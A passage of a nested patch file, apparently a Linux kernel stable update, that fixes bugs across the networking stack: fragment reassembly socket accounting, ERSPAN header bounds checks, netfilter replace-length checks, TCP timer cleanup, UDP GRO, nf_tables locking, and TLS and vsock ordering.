++
+ 	hash = sock_hash_bucket_hash(key, key_size);
+ 	bucket = sock_hash_select_bucket(htab, hash);
+ 
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 79fa19a36bbd1..8407098a59391 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -289,6 +289,7 @@ static bool inet_bhash2_addr_any_conflict(const struct sock *sk, int port, int l
+ 	struct sock_reuseport *reuseport_cb;
+ 	struct inet_bind_hashbucket *head2;
+ 	struct inet_bind2_bucket *tb2;
++	bool conflict = false;
+ 	bool reuseport_cb_ok;
+ 
+ 	rcu_read_lock();
+@@ -301,18 +302,20 @@ static bool inet_bhash2_addr_any_conflict(const struct sock *sk, int port, int l
+ 
+ 	spin_lock(&head2->lock);
+ 
+-	inet_bind_bucket_for_each(tb2, &head2->chain)
+-		if (inet_bind2_bucket_match_addr_any(tb2, net, port, l3mdev, sk))
+-			break;
++	inet_bind_bucket_for_each(tb2, &head2->chain) {
++		if (!inet_bind2_bucket_match_addr_any(tb2, net, port, l3mdev, sk))
++			continue;
+ 
+-	if (tb2 && inet_bhash2_conflict(sk, tb2, uid, relax, reuseport_cb_ok,
+-					reuseport_ok)) {
+-		spin_unlock(&head2->lock);
+-		return true;
++		if (!inet_bhash2_conflict(sk, tb2, uid, relax, reuseport_cb_ok, reuseport_ok))
++			continue;
++
++		conflict = true;
++		break;
+ 	}
+ 
+ 	spin_unlock(&head2->lock);
+-	return false;
++
++	return conflict;
+ }
+ 
+ /*
+@@ -771,6 +774,20 @@ void inet_csk_clear_xmit_timers(struct sock *sk)
+ }
+ EXPORT_SYMBOL(inet_csk_clear_xmit_timers);
+ 
++void inet_csk_clear_xmit_timers_sync(struct sock *sk)
++{
++	struct inet_connection_sock *icsk = inet_csk(sk);
++
++	/* ongoing timer handlers need to acquire socket lock. */
++	sock_not_owned_by_me(sk);
++
++	icsk->icsk_pending = icsk->icsk_ack.pending = 0;
++
++	sk_stop_timer_sync(sk, &icsk->icsk_retransmit_timer);
++	sk_stop_timer_sync(sk, &icsk->icsk_delack_timer);
++	sk_stop_timer_sync(sk, &sk->sk_timer);
++}
++
+ void inet_csk_delete_keepalive_timer(struct sock *sk)
+ {
+ 	sk_stop_timer(sk, &sk->sk_timer);
+diff --git a/net/ipv4/inet_fragment.c b/net/ipv4/inet_fragment.c
+index c9f9ac5013a71..834cdc57755f7 100644
+--- a/net/ipv4/inet_fragment.c
++++ b/net/ipv4/inet_fragment.c
+@@ -24,6 +24,8 @@
+ #include <net/ip.h>
+ #include <net/ipv6.h>
+ 
++#include "../core/sock_destructor.h"
++
+ /* Use skb->cb to track consecutive/adjacent fragments coming at
+  * the end of the queue. Nodes in the rb-tree queue will
+  * contain "runs" of one or more adjacent fragments.
+@@ -39,6 +41,7 @@ struct ipfrag_skb_cb {
+ 	};
+ 	struct sk_buff		*next_frag;
+ 	int			frag_run_len;
++	int			ip_defrag_offset;
+ };
+ 
+ #define FRAG_CB(skb)		((struct ipfrag_skb_cb *)((skb)->cb))
+@@ -390,12 +393,12 @@ int inet_frag_queue_insert(struct inet_frag_queue *q, struct sk_buff *skb,
+ 	 */
+ 	if (!last)
+ 		fragrun_create(q, skb);  /* First fragment. */
+-	else if (last->ip_defrag_offset + last->len < end) {
++	else if (FRAG_CB(last)->ip_defrag_offset + last->len < end) {
+ 		/* This is the common case: skb goes to the end. */
+ 		/* Detect and discard overlaps. */
+-		if (offset < last->ip_defrag_offset + last->len)
++		if (offset < FRAG_CB(last)->ip_defrag_offset + last->len)
+ 			return IPFRAG_OVERLAP;
+-		if (offset == last->ip_defrag_offset + last->len)
++		if (offset == FRAG_CB(last)->ip_defrag_offset + last->len)
+ 			fragrun_append_to_last(q, skb);
+ 		else
+ 			fragrun_create(q, skb);
+@@ -412,13 +415,13 @@ int inet_frag_queue_insert(struct inet_frag_queue *q, struct sk_buff *skb,
+ 
+ 			parent = *rbn;
+ 			curr = rb_to_skb(parent);
+-			curr_run_end = curr->ip_defrag_offset +
++			curr_run_end = FRAG_CB(curr)->ip_defrag_offset +
+ 					FRAG_CB(curr)->frag_run_len;
+-			if (end <= curr->ip_defrag_offset)
++			if (end <= FRAG_CB(curr)->ip_defrag_offset)
+ 				rbn = &parent->rb_left;
+ 			else if (offset >= curr_run_end)
+ 				rbn = &parent->rb_right;
+-			else if (offset >= curr->ip_defrag_offset &&
++			else if (offset >= FRAG_CB(curr)->ip_defrag_offset &&
+ 				 end <= curr_run_end)
+ 				return IPFRAG_DUP;
+ 			else
+@@ -432,7 +435,7 @@ int inet_frag_queue_insert(struct inet_frag_queue *q, struct sk_buff *skb,
+ 		rb_insert_color(&skb->rbnode, &q->rb_fragments);
+ 	}
+ 
+-	skb->ip_defrag_offset = offset;
++	FRAG_CB(skb)->ip_defrag_offset = offset;
+ 
+ 	return IPFRAG_OK;
+ }
+@@ -442,13 +445,28 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 			      struct sk_buff *parent)
+ {
+ 	struct sk_buff *fp, *head = skb_rb_first(&q->rb_fragments);
+-	struct sk_buff **nextp;
++	void (*destructor)(struct sk_buff *);
++	unsigned int orig_truesize = 0;
++	struct sk_buff **nextp = NULL;
++	struct sock *sk = skb->sk;
+ 	int delta;
+ 
++	if (sk && is_skb_wmem(skb)) {
++		/* TX: skb->sk might have been passed as argument to
++		 * dst->output and must remain valid until tx completes.
++		 *
++		 * Move sk to reassembled skb and fix up wmem accounting.
++		 */
++		orig_truesize = skb->truesize;
++		destructor = skb->destructor;
++	}
++
+ 	if (head != skb) {
+ 		fp = skb_clone(skb, GFP_ATOMIC);
+-		if (!fp)
+-			return NULL;
++		if (!fp) {
++			head = skb;
++			goto out_restore_sk;
++		}
+ 		FRAG_CB(fp)->next_frag = FRAG_CB(skb)->next_frag;
+ 		if (RB_EMPTY_NODE(&skb->rbnode))
+ 			FRAG_CB(parent)->next_frag = fp;
+@@ -457,6 +475,12 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 					&q->rb_fragments);
+ 		if (q->fragments_tail == skb)
+ 			q->fragments_tail = fp;
++
++		if (orig_truesize) {
++			/* prevent skb_morph from releasing sk */
++			skb->sk = NULL;
++			skb->destructor = NULL;
++		}
+ 		skb_morph(skb, head);
+ 		FRAG_CB(skb)->next_frag = FRAG_CB(head)->next_frag;
+ 		rb_replace_node(&head->rbnode, &skb->rbnode,
+@@ -464,13 +488,13 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 		consume_skb(head);
+ 		head = skb;
+ 	}
+-	WARN_ON(head->ip_defrag_offset != 0);
++	WARN_ON(FRAG_CB(head)->ip_defrag_offset != 0);
+ 
+ 	delta = -head->truesize;
+ 
+ 	/* Head of list must not be cloned. */
+ 	if (skb_unclone(head, GFP_ATOMIC))
+-		return NULL;
++		goto out_restore_sk;
+ 
+ 	delta += head->truesize;
+ 	if (delta)
+@@ -486,7 +510,7 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 
+ 		clone = alloc_skb(0, GFP_ATOMIC);
+ 		if (!clone)
+-			return NULL;
++			goto out_restore_sk;
+ 		skb_shinfo(clone)->frag_list = skb_shinfo(head)->frag_list;
+ 		skb_frag_list_init(head);
+ 		for (i = 0; i < skb_shinfo(head)->nr_frags; i++)
+@@ -503,6 +527,21 @@ void *inet_frag_reasm_prepare(struct inet_frag_queue *q, struct sk_buff *skb,
+ 		nextp = &skb_shinfo(head)->frag_list;
+ 	}
+ 
++out_restore_sk:
++	if (orig_truesize) {
++		int ts_delta = head->truesize - orig_truesize;
++
++		/* if this reassembled skb is fragmented later,
++		 * fraglist skbs will get skb->sk assigned from head->sk,
++		 * and each frag skb will be released via sock_wfree.
++		 *
++		 * Update sk_wmem_alloc.
++		 */
++		head->sk = sk;
++		head->destructor = destructor;
++		refcount_add(ts_delta, &sk->sk_wmem_alloc);
++	}
++
+ 	return nextp;
+ }
+ EXPORT_SYMBOL(inet_frag_reasm_prepare);
+@@ -510,6 +549,8 @@ EXPORT_SYMBOL(inet_frag_reasm_prepare);
+ void inet_frag_reasm_finish(struct inet_frag_queue *q, struct sk_buff *head,
+ 			    void *reasm_data, bool try_coalesce)
+ {
++	struct sock *sk = is_skb_wmem(head) ? head->sk : NULL;
++	const unsigned int head_truesize = head->truesize;
+ 	struct sk_buff **nextp = reasm_data;
+ 	struct rb_node *rbn;
+ 	struct sk_buff *fp;
+@@ -573,6 +614,9 @@ void inet_frag_reasm_finish(struct inet_frag_queue *q, struct sk_buff *head,
+ 	head->prev = NULL;
+ 	head->tstamp = q->stamp;
+ 	head->mono_delivery_time = q->mono_delivery_time;
++
++	if (sk)
++		refcount_add(sum_truesize - head_truesize, &sk->sk_wmem_alloc);
+ }
+ EXPORT_SYMBOL(inet_frag_reasm_finish);
+ 
+diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c
+index fb153569889ec..6c309c1ec3b0f 100644
+--- a/net/ipv4/ip_fragment.c
++++ b/net/ipv4/ip_fragment.c
+@@ -378,6 +378,7 @@ static int ip_frag_queue(struct ipq *qp, struct sk_buff *skb)
+ 	}
+ 
+ 	skb_dst_drop(skb);
++	skb_orphan(skb);
+ 	return -EINPROGRESS;
+ 
+ insert_error:
+@@ -480,7 +481,6 @@ int ip_defrag(struct net *net, struct sk_buff *skb, u32 user)
+ 	struct ipq *qp;
+ 
+ 	__IP_INC_STATS(net, IPSTATS_MIB_REASMREQDS);
+-	skb_orphan(skb);
+ 
+ 	/* Lookup (or create) queue header */
+ 	qp = ip_find(net, ip_hdr(skb), user, vif);
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index d67d026d7f975..0267fa05374aa 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -280,8 +280,13 @@ static int erspan_rcv(struct sk_buff *skb, struct tnl_ptk_info *tpi,
+ 					  tpi->flags | TUNNEL_NO_KEY,
+ 					  iph->saddr, iph->daddr, 0);
+ 	} else {
++		if (unlikely(!pskb_may_pull(skb,
++					    gre_hdr_len + sizeof(*ershdr))))
++			return PACKET_REJECT;
++
+ 		ershdr = (struct erspan_base_hdr *)(skb->data + gre_hdr_len);
+ 		ver = ershdr->ver;
++		iph = ip_hdr(skb);
+ 		tunnel = ip_tunnel_lookup(itn, skb->dev->ifindex,
+ 					  tpi->flags | TUNNEL_KEY,
+ 					  iph->saddr, iph->daddr, tpi->key);
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index 2407066b0fec1..b150c9929b12e 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
+@@ -956,6 +956,8 @@ static int do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct arpt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1254,6 +1256,8 @@ static int compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct arpt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index da5998011ab9b..1f365e28e316c 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1110,6 +1110,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ipt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1494,6 +1496,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ipt_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 5a165e29f7be4..f01c0a5d2c37b 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3052,6 +3052,8 @@ void tcp_close(struct sock *sk, long timeout)
+ 	lock_sock(sk);
+ 	__tcp_close(sk, timeout);
+ 	release_sock(sk);
++	if (!sk->sk_net_refcnt)
++		inet_csk_clear_xmit_timers_sync(sk);
+ 	sock_put(sk);
+ }
+ EXPORT_SYMBOL(tcp_close);
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 7856b7a3e0ee9..2a78c78186c37 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -603,6 +603,13 @@ static inline bool __udp_is_mcast_sock(struct net *net, struct sock *sk,
+ }
+ 
+ DEFINE_STATIC_KEY_FALSE(udp_encap_needed_key);
++EXPORT_SYMBOL(udp_encap_needed_key);
++
++#if IS_ENABLED(CONFIG_IPV6)
++DEFINE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
++EXPORT_SYMBOL(udpv6_encap_needed_key);
++#endif
++
+ void udp_encap_enable(void)
+ {
+ 	static_branch_inc(&udp_encap_needed_key);
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 8096576fd9bde..84b7d6089f76c 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -441,8 +441,9 @@ static int skb_gro_receive_list(struct sk_buff *p, struct sk_buff *skb)
+ 	NAPI_GRO_CB(p)->count++;
+ 	p->data_len += skb->len;
+ 
+-	/* sk owenrship - if any - completely transferred to the aggregated packet */
++	/* sk ownership - if any - completely transferred to the aggregated packet */
+ 	skb->destructor = NULL;
++	skb->sk = NULL;
+ 	p->truesize += skb->truesize;
+ 	p->len += skb->len;
+ 
+@@ -543,11 +544,19 @@ struct sk_buff *udp_gro_receive(struct list_head *head, struct sk_buff *skb,
+ 	unsigned int off = skb_gro_offset(skb);
+ 	int flush = 1;
+ 
+-	/* we can do L4 aggregation only if the packet can't land in a tunnel
+-	 * otherwise we could corrupt the inner stream
++	/* We can do L4 aggregation only if the packet can't land in a tunnel;
++	 * otherwise we could corrupt the inner stream. Detecting such packets
++	 * cannot be foolproof and the aggregation might still happen in some
++	 * cases. Such packets should be caught in udp_unexpected_gso later.
+ 	 */
+ 	NAPI_GRO_CB(skb)->is_flist = 0;
+ 	if (!sk || !udp_sk(sk)->gro_receive) {
++		/* If the packet was locally encapsulated in a UDP tunnel that
++		 * wasn't detected above, do not GRO.
++		 */
++		if (skb->encapsulation)
++			goto out;
++
+ 		if (skb->dev->features & NETIF_F_GRO_FRAGLIST)
+ 			NAPI_GRO_CB(skb)->is_flist = sk ? !udp_test_bit(GRO_ENABLED, sk) : 1;
+ 
+@@ -707,13 +716,7 @@ INDIRECT_CALLABLE_SCOPE int udp4_gro_complete(struct sk_buff *skb, int nhoff)
+ 		skb_shinfo(skb)->gso_type |= (SKB_GSO_FRAGLIST|SKB_GSO_UDP_L4);
+ 		skb_shinfo(skb)->gso_segs = NAPI_GRO_CB(skb)->count;
+ 
+-		if (skb->ip_summed == CHECKSUM_UNNECESSARY) {
+-			if (skb->csum_level < SKB_MAX_CSUM_LEVEL)
+-				skb->csum_level++;
+-		} else {
+-			skb->ip_summed = CHECKSUM_UNNECESSARY;
+-			skb->csum_level = 0;
+-		}
++		__skb_incr_checksum_unnecessary(skb);
+ 
+ 		return 0;
+ 	}
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index 1840735e9cb07..e606374854ce5 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -646,19 +646,19 @@ static int inet6_dump_fib(struct sk_buff *skb, struct netlink_callback *cb)
+ 	if (!w) {
+ 		/* New dump:
+ 		 *
+-		 * 1. hook callback destructor.
+-		 */
+-		cb->args[3] = (long)cb->done;
+-		cb->done = fib6_dump_done;
+-
+-		/*
+-		 * 2. allocate and initialize walker.
++		 * 1. allocate and initialize walker.
+ 		 */
+ 		w = kzalloc(sizeof(*w), GFP_ATOMIC);
+ 		if (!w)
+ 			return -ENOMEM;
+ 		w->func = fib6_dump_node;
+ 		cb->args[2] = (long)w;
++
++		/* 2. hook callback destructor.
++		 */
++		cb->args[3] = (long)cb->done;
++		cb->done = fib6_dump_done;
++
+ 	}
+ 
+ 	arg.skb = skb;
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index d3fba7d8dec4e..b3e2d658af809 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -528,6 +528,9 @@ static int ip6erspan_rcv(struct sk_buff *skb,
+ 	struct ip6_tnl *tunnel;
+ 	u8 ver;
+ 
++	if (unlikely(!pskb_may_pull(skb, sizeof(*ershdr))))
++		return PACKET_REJECT;
++
+ 	ipv6h = ipv6_hdr(skb);
+ 	ershdr = (struct erspan_base_hdr *)skb->data;
+ 	ver = ershdr->ver;
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 0ce0ed17c7583..37a2b3301e423 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1127,6 +1127,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ip6t_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+@@ -1503,6 +1505,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 	void *loc_cpu_entry;
+ 	struct ip6t_entry *iter;
+ 
++	if (len < sizeof(tmp))
++		return -EINVAL;
+ 	if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)
+ 		return -EFAULT;
+ 
+diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
+index 38db0064d6613..87a394179092c 100644
+--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
++++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
+@@ -293,6 +293,7 @@ static int nf_ct_frag6_queue(struct frag_queue *fq, struct sk_buff *skb,
+ 	}
+ 
+ 	skb_dst_drop(skb);
++	skb_orphan(skb);
+ 	return -EINPROGRESS;
+ 
+ insert_error:
+@@ -468,7 +469,6 @@ int nf_ct_frag6_gather(struct net *net, struct sk_buff *skb, u32 user)
+ 	hdr = ipv6_hdr(skb);
+ 	fhdr = (struct frag_hdr *)skb_transport_header(skb);
+ 
+-	skb_orphan(skb);
+ 	fq = fq_find(net, fhdr->identification, user, hdr,
+ 		     skb->dev ? skb->dev->ifindex : 0);
+ 	if (fq == NULL) {
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index c2c02dea6c386..1775e9b9b85ad 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -476,7 +476,7 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	goto try_again;
+ }
+ 
+-DEFINE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
++DECLARE_STATIC_KEY_FALSE(udpv6_encap_needed_key);
+ void udpv6_encap_enable(void)
+ {
+ 	static_branch_inc(&udpv6_encap_needed_key);
+diff --git a/net/ipv6/udp_offload.c b/net/ipv6/udp_offload.c
+index 7720d04ed396d..b98c4c8d8e274 100644
+--- a/net/ipv6/udp_offload.c
++++ b/net/ipv6/udp_offload.c
+@@ -169,13 +169,7 @@ INDIRECT_CALLABLE_SCOPE int udp6_gro_complete(struct sk_buff *skb, int nhoff)
+ 		skb_shinfo(skb)->gso_type |= (SKB_GSO_FRAGLIST|SKB_GSO_UDP_L4);
+ 		skb_shinfo(skb)->gso_segs = NAPI_GRO_CB(skb)->count;
+ 
+-		if (skb->ip_summed == CHECKSUM_UNNECESSARY) {
+-			if (skb->csum_level < SKB_MAX_CSUM_LEVEL)
+-				skb->csum_level++;
+-		} else {
+-			skb->ip_summed = CHECKSUM_UNNECESSARY;
+-			skb->csum_level = 0;
+-		}
++		__skb_incr_checksum_unnecessary(skb);
+ 
+ 		return 0;
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 3bc21581486ae..c652c8ca765c2 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3349,9 +3349,6 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 
+ 		newsk = new_mptcp_sock;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEPASSIVEACK);
+-	} else {
+-		MPTCP_INC_STATS(sock_net(sk),
+-				MPTCP_MIB_MPCAPABLEPASSIVEFALLBACK);
+ 	}
+ 
+ out:
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 891c2f4fed080..f1d422396b28b 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -816,6 +816,8 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	return child;
+ 
+ fallback:
++	if (fallback)
++		SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_MPCAPABLEPASSIVEFALLBACK);
+ 	mptcp_subflow_drop_ctx(child);
+ 	return child;
+ }
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 2a5d9075a081d..8d38cd5047692 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -2372,6 +2372,9 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 		struct nft_stats __percpu *stats = NULL;
+ 		struct nft_chain_hook hook;
+ 
++		if (table->flags & __NFT_TABLE_F_UPDATE)
++			return -EINVAL;
++
+ 		if (flags & NFT_CHAIN_BINDING)
+ 			return -EOPNOTSUPP;
+ 
+@@ -7838,11 +7841,12 @@ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+ 	return err;
+ }
+ 
++/* call under rcu_read_lock */
+ static const struct nf_flowtable_type *__nft_flowtable_type_get(u8 family)
+ {
+ 	const struct nf_flowtable_type *type;
+ 
+-	list_for_each_entry(type, &nf_tables_flowtables, list) {
++	list_for_each_entry_rcu(type, &nf_tables_flowtables, list) {
+ 		if (family == type->family)
+ 			return type;
+ 	}
+@@ -7854,9 +7858,13 @@ nft_flowtable_type_get(struct net *net, u8 family)
+ {
+ 	const struct nf_flowtable_type *type;
+ 
++	rcu_read_lock();
+ 	type = __nft_flowtable_type_get(family);
+-	if (type != NULL && try_module_get(type->owner))
++	if (type != NULL && try_module_get(type->owner)) {
++		rcu_read_unlock();
+ 		return type;
++	}
++	rcu_read_unlock();
+ 
+ 	lockdep_nfnl_nft_mutex_not_held();
+ #ifdef CONFIG_MODULES
+@@ -10978,6 +10986,7 @@ static void __exit nf_tables_module_exit(void)
+ 	unregister_netdevice_notifier(&nf_tables_flowtable_notifier);
+ 	nft_chain_filter_fini();
+ 	nft_chain_route_fini();
++	nf_tables_trans_destroy_flush_work();
+ 	unregister_pernet_subsys(&nf_tables_net_ops);
+ 	cancel_work_sync(&trans_gc_work);
+ 	cancel_work_sync(&trans_destroy_work);
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index b5071a2f597d4..f76a2d8060340 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -1512,6 +1512,11 @@ static void nci_rx_work(struct work_struct *work)
+ 		nfc_send_to_raw_sock(ndev->nfc_dev, skb,
+ 				     RAW_PAYLOAD_NCI, NFC_DIRECTION_RX);
+ 
++		if (!nci_plen(skb->data)) {
++			kfree_skb(skb);
++			break;
++		}
++
+ 		/* Process frame */
+ 		switch (nci_mt(skb->data)) {
+ 		case NCI_MT_RSP_PKT:
+diff --git a/net/rds/rdma.c b/net/rds/rdma.c
+index a4e3c5de998be..00dbcd4d28e68 100644
+--- a/net/rds/rdma.c
++++ b/net/rds/rdma.c
+@@ -302,7 +302,7 @@ static int __rds_rdma_map(struct rds_sock *rs, struct rds_get_mr_args *args,
+ 		}
+ 		ret = PTR_ERR(trans_private);
+ 		/* Trigger connection so that its ready for the next retry */
+-		if (ret == -ENODEV)
++		if (ret == -ENODEV && cp)
+ 			rds_conn_connect_if_down(cp->cp_conn);
+ 		goto out;
+ 	}
+diff --git a/net/sched/act_skbmod.c b/net/sched/act_skbmod.c
+index d98758a639340..744ff9729469e 100644
+--- a/net/sched/act_skbmod.c
++++ b/net/sched/act_skbmod.c
+@@ -239,13 +239,13 @@ static int tcf_skbmod_dump(struct sk_buff *skb, struct tc_action *a,
+ 	struct tcf_skbmod *d = to_skbmod(a);
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	struct tcf_skbmod_params  *p;
+-	struct tc_skbmod opt = {
+-		.index   = d->tcf_index,
+-		.refcnt  = refcount_read(&d->tcf_refcnt) - ref,
+-		.bindcnt = atomic_read(&d->tcf_bindcnt) - bind,
+-	};
++	struct tc_skbmod opt;
+ 	struct tcf_t t;
+ 
++	memset(&opt, 0, sizeof(opt));
++	opt.index   = d->tcf_index;
++	opt.refcnt  = refcount_read(&d->tcf_refcnt) - ref;
++	opt.bindcnt = atomic_read(&d->tcf_bindcnt) - bind;
+ 	spin_lock_bh(&d->tcf_lock);
+ 	opt.action = d->tcf_action;
+ 	p = rcu_dereference_protected(d->skbmod_p,
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index e8f988e1c7e64..334a563e0bc14 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -806,7 +806,7 @@ void qdisc_tree_reduce_backlog(struct Qdisc *sch, int n, int len)
+ 		notify = !sch->q.qlen && !WARN_ON_ONCE(!n &&
+ 						       !qdisc_is_offloaded);
+ 		/* TODO: perform the search on a per txq basis */
+-		sch = qdisc_lookup(qdisc_dev(sch), TC_H_MAJ(parentid));
++		sch = qdisc_lookup_rcu(qdisc_dev(sch), TC_H_MAJ(parentid));
+ 		if (sch == NULL) {
+ 			WARN_ON_ONCE(parentid != TC_H_ROOT);
+ 			break;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index bdb5153f3788a..348abadbc2d82 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2062,10 +2062,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return sock_recv_errqueue(sk, msg, len, SOL_IP, IP_RECVERR);
+ 
+-	psock = sk_psock_get(sk);
+ 	err = tls_rx_reader_lock(sk, ctx, flags & MSG_DONTWAIT);
+ 	if (err < 0)
+ 		return err;
++	psock = sk_psock_get(sk);
+ 	bpf_strp_enabled = sk_psock_strp_enabled(psock);
+ 
+ 	/* If crypto failed the connection is broken */
+@@ -2238,12 +2238,15 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		}
+ 
+ 		/* Drain records from the rx_list & copy if required */
+-		if (is_peek || is_kvec)
++		if (is_peek)
+ 			err = process_rx_list(ctx, msg, &control, copied + peeked,
+ 					      decrypted - peeked, is_peek, NULL);
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek, NULL);
++
++		/* we could have copied less than we wanted, and possibly nothing */
++		decrypted += max(err, 0) - async_copy_bytes;
+ 	}
+ 
+ 	copied += decrypted;
+diff --git a/net/vmw_vsock/virtio_transport.c b/net/vmw_vsock/virtio_transport.c
+index 16575ea836590..5434c9f11d28d 100644
+--- a/net/vmw_vsock/virtio_transport.c
++++ b/net/vmw_vsock/virtio_transport.c
+@@ -109,7 +109,6 @@ virtio_transport_send_pkt_work(struct work_struct *work)
+ 		if (!skb)
+ 			break;
+ 
+-		virtio_transport_deliver_tap_pkt(skb);
+ 		reply = virtio_vsock_skb_reply(skb);
+ 
+ 		sg_init_one(&hdr, virtio_vsock_hdr(skb), sizeof(*virtio_vsock_hdr(skb)));
+@@ -128,6 +127,8 @@ virtio_transport_send_pkt_work(struct work_struct *work)
+ 			break;
+ 		}
+ 
++		virtio_transport_deliver_tap_pkt(skb);
++
+ 		if (reply) {
+ 			struct virtqueue *rx_vq = vsock->vqs[VSOCK_VQ_RX];
+ 			int val;
+diff --git a/scripts/bpf_doc.py b/scripts/bpf_doc.py
+index 4de98b7bbea95..c2da6ed32104f 100755
+--- a/scripts/bpf_doc.py
++++ b/scripts/bpf_doc.py
+@@ -396,8 +396,8 @@ class PrinterRST(Printer):
+             version = version.stdout.decode().rstrip()
+         except:
+             try:
+-                version = subprocess.run(['make', 'kernelversion'], cwd=linuxRoot,
+-                                         capture_output=True, check=True)
++                version = subprocess.run(['make', '-s', '--no-print-directory', 'kernelversion'],
++                                         cwd=linuxRoot, capture_output=True, check=True)
+                 version = version.stdout.decode().rstrip()
+             except:
+                 return 'Linux'
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index fb12034d464ee..e8cf38dc8a5e0 100644
+--- a/sound/pci/hda/patch_realtek.c
